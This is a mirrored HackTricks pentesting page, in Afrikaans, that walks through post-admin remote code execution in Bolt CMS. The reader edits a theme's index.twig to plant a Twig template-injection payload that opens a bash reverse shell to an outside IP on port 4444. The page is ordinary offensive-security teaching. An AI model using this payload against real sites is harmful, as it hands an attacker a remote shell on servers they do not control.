mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
51 lines
3.3 KiB
Markdown
51 lines
3.3 KiB
Markdown
# Bolt CMS
|
|
|
|
{% hint style="success" %}
|
|
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
|
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
## RCE
|
|
|
|
Na aanmelding as admin (gaan na /bot om die aanmeldprompt te bereik), kan jy RCE in Bolt CMS verkry:
|
|
|
|
* Kies `Configuration` -> `View Configuration` -> `Main Configuration` of gaan na die URL pad `/bolt/file-edit/config?file=/bolt/config.yaml`
|
|
* Kontroleer die waarde van tema
|
|
|
|
<figure><img src="../../.gitbook/assets/image (771).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
* Kies `File management` -> `View & edit templates`
|
|
* Kies die tema basis wat in die vorige (`base-2021` in hierdie geval) stap gevind is en kies `index.twig`
|
|
* In my geval is dit in die URL pad /bolt/file-edit/themes?file=/base-2021/index.twig
|
|
* Stel jou payload in hierdie lêer via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), soos: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
|
|
* En stoor veranderinge
|
|
|
|
<figure><img src="../../.gitbook/assets/image (948).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
* Maak die cache skoon in `Maintenance` -> `Clear the cache`
|
|
* Toegang weer die bladsy as 'n gewone gebruiker, en die payload behoort uitgevoer te word
|
|
|
|
{% hint style="success" %}
|
|
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
|
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|